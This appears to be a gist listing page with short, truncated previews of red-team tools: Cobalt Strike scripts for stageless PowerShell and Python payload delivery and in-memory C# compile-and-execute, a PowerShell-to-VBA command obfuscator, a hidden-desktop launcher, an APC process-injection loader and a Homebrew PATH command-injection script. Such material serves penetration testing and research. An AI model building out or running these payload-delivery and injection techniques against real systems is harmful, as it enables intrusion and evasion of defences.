This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Stageless Scripted Web Delivery | |
# setup our stageless Python Web Delivery attack | |
sub setup_attack { | |
local('%options $x86payload $x64payload $url $script'); | |
%options = $3; | |
# generate our stageless x86 payload | |
artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
yield; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"io/ioutil" | |
"os" | |
"os/exec" | |
"strconv" | |
"syscall" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1" | |
); | |
$result = "" | |
$strA = $string.ToCharArray() | |
for($i = 0; $i -lt $strA.Length; $i++) | |
{ | |
$x = [byte]$strA[$i] | |
$result += "Chr (" + $x.ToString() + ") & " | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Scripted Web Delivery (Stageless) | |
# | |
# This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
# setup our stageless PowerShell Web Delivery attack | |
sub setup_attack { | |
local('%options $script $url $arch'); | |
%options = $3; | |
# get the arch right. |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[*] - C:\Windows\System32\1028\VsGraphicsResources.dll | |
[?] 64-bit Image! | |
[>] Time Stamp: 12/31/1969 19:00:00 | |
[>] Function Count: | |
[>] Named Functions: | |
[>] Ordinal Base: | |
[>] Function Array RVA: 0x | |
[>] Name Array RVA: 0x |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// To compile: gcc64.exe run.c -o run.exe | |
// To run: run.exe cmd.exe "/c whoami" | |
#include <Windows.h> | |
#include <stdio.h> | |
int main(int argc, char **argv) { | |
CHAR cDesktop[] = "hiddendesktop"; | |
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Command Injection via Homebrew $PATH trickery | |
# n0ncetonic | |
# Blacksun Research Labs 2019 | |
# https://github.com/n0ncetonic | |
# https://github.com/BlacksunLabs | |
banner=$(/bin/cat <<EOF | |
OlderNewer